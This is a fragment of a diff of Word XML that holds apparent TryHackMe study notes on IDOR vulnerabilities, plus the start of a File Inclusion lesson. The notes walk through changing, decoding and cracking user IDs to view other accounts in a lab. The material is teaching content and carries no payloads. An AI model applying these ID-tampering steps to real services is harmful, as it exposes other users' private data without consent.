+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>What is an IDOR?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>n this room, you're going to learn what an IDOR vulnerability is, what they look like, how to find them and a practical task exploiting a real case scenario.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>What is an IDOR?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>IDOR stands for Insecure Direct Object Reference and is a type of access control vulnerability.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>This type of vulnerability can occur when a web server receives user-supplied input to retrieve objects (files, data, documents), too much trust has been placed on the input data, and it is not validated on the server-side to confirm the requested object belongs to the user requesting it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>b-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
+          <w:color w:val="F9F9FB"/>
+          <w:highlight w:val="magenta"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>An IDOR Example</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>magine you've just signed up for an online service, and you want to change your profile information. The link you click on goes to http://online-service.thm/profile?user_id=1305, and you can see your information.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">Curiosity gets the better of you, and you try changing the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>user_id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> value to 1000 instead (http://online-service.thm/profile?user_id=1000), and to your surprise, you can now see another user's information. You've now discovered an IDOR vulnerability! Ideally, there should be a check on the website to confirm that the user information belongs to the user </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>logged requesting it.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+        <w:t>Using what you've learnt above, click on the View Site button and try and receive a flag by discovering and exploiting an IDOR vulnerability.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>c-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
+          <w:color w:val="F9F9FB"/>
+          <w:highlight w:val="magenta"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>Finding IDORs in Encoded IDs</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Encoded IDs</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>When passing data from page to page either by post data, query strings, or cookies, web developers will often first take the raw data and encode it. Encoding ensures that the receiving web server will be able to understand the contents. Encoding changes binary data into an ASCII string commonly using the a-z, A-Z, 0-9 and = character for padding. The most common encoding technique on the web is base64 encoding and can usually be pretty easy to spot. You can use websites like </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId61" w:tgtFrame="_blank" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:b/>
+            <w:bCs/>
+          </w:rPr>
+          <w:t>https://www.base64decode.org/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t> to decode the string, then edit the data and re-encode it again using </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId62" w:tgtFrame="_blank" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:b/>
+            <w:bCs/>
+          </w:rPr>
+          <w:t>https://www.base64encode.org/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t> and then resubmit the web request to see if there is a change in the response.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+        <w:t>See the image below as a graphical example of this process:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="788E3129" wp14:editId="0151D286">
+            <wp:extent cx="5943600" cy="455295"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
+            <wp:docPr id="37933827" name="Picture 73"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 274"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId63" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="455295"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>d-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
+          <w:color w:val="F9F9FB"/>
+          <w:highlight w:val="magenta"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>Finding IDORs in Hashed IDs</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Hashed IDs</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Hashed IDs are a little bit more complicated to deal with than encoded ones, but they may follow a predictable pattern, such as being the hashed version of the integer value. For example, the Id number 123 would become 202cb962ac59075b964b07152d234b70 if md5 hashing were in use.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>It's worthwhile putting any discovered hashes through a web service such as </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId64" w:tgtFrame="_blank" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:b/>
+            <w:bCs/>
+          </w:rPr>
+          <w:t>https://crackstation.net/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (which has a database of billions of </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>hash</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to value results) to see if we can find any matches.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>e-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
+          <w:color w:val="F9F9FB"/>
+          <w:highlight w:val="magenta"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>Finding IDORs in Unpredictable IDs</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Unpredictable IDs</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">If the Id cannot be detected using the above methods, an excellent method of IDOR detection is to create two accounts and swap the Id numbers between them. If you can view the other </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>users' content using their Id number while still being logged in with a different account (or not logged in at all), you've found a valid IDOR vulnerability.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>f-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
+          <w:color w:val="F9F9FB"/>
+          <w:highlight w:val="magenta"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>Where are IDORs located</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Where are they located?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>The vulnerable endpoint you're targeting may not always be something you see in the address bar. It could be content your browser loads in via an AJAX request or something that you find referenced in a JavaScript file. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Sometimes endpoints could have an unreferenced parameter that may have been of some use during development and got pushed to production. For example, you may notice a call to /user/details displaying your user information (authenticated through your session). But through an attack known as parameter mining, you discover a parameter called </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>user_id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t> that you can use to display other users' information, for example, /user/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>details?user_id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>=123.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>g-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
+          <w:color w:val="F9F9FB"/>
+          <w:highlight w:val="magenta"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>A Practical IDOR Example</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Begin by pressing the Start Machine button; once started, click the below link and open it in a new browser tab:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId65" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:b/>
+            <w:bCs/>
+          </w:rPr>
+          <w:t>https://LAB_WEB_URL.p.thmlabs.com</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Firstly</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> you'll need to log in. To do this, click on the customer's section and create an account. Once logged in, click on the Your Account tab. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>The Your Account section gives you the ability to change your information such as username, email address and password. You'll notice the username and email fields pre-filled in with your information.  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>We'll start by investigating how this information gets pre-filled. If you open your browser developer tools, select the network tab and then refresh the page, you'll see a call to an endpoint with the path /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>api</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/v1/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>customer?id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>={</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>user_id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>}.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>This page returns in JSON format your user id, username and email address. We can see from the path that the user information shown is taken from the query string's id parameter (see below image).</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33C7AC27" wp14:editId="7871C442">
+            <wp:extent cx="5943600" cy="962660"/>
+            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
+            <wp:docPr id="1089505837" name="Picture 75"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 281"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId66" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="962660"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>You can try testing this id parameter for an IDOR vulnerability by changing the id to another user's id. Try selecting users with IDs 1 and 3 and then answer the questions below.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="green"/>
+        </w:rPr>
+        <w:t>6-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
+          <w:color w:val="F9F9FB"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:highlight w:val="green"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="green"/>
+        </w:rPr>
+        <w:t>File Inclusion</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>https://rahulk2903.medium.com/file-inclusion-tryhackme-walkthrough-99288e6dd348</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>a-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
+          <w:color w:val="F9F9FB"/>
+          <w:highlight w:val="magenta"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>Introduction</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>What is File inclusion?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>This room aims to equip you with the essential knowledge to exploit file inclusion vulnerabilities, including Local File Inclusion (LFI), Remote File Inclusion (RFI), and directory traversal. Also, we will discuss the risk of these vulnerabilities if they're found and the required remediation. We provide some practical examples of each vulnerability as well as hands-on challenges.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>In some scenarios, web applications are written to request access to files on a given system, including images, static text, and so on via parameters. Parameters are query parameter strings attached to the URL that could be used to retrieve data or perform actions based on user input. The following diagram breaks down the essential parts of a URL.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A581446" wp14:editId="7B898786">
+            <wp:extent cx="5943600" cy="2822575"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="104293140" name="Picture 79"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 293"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
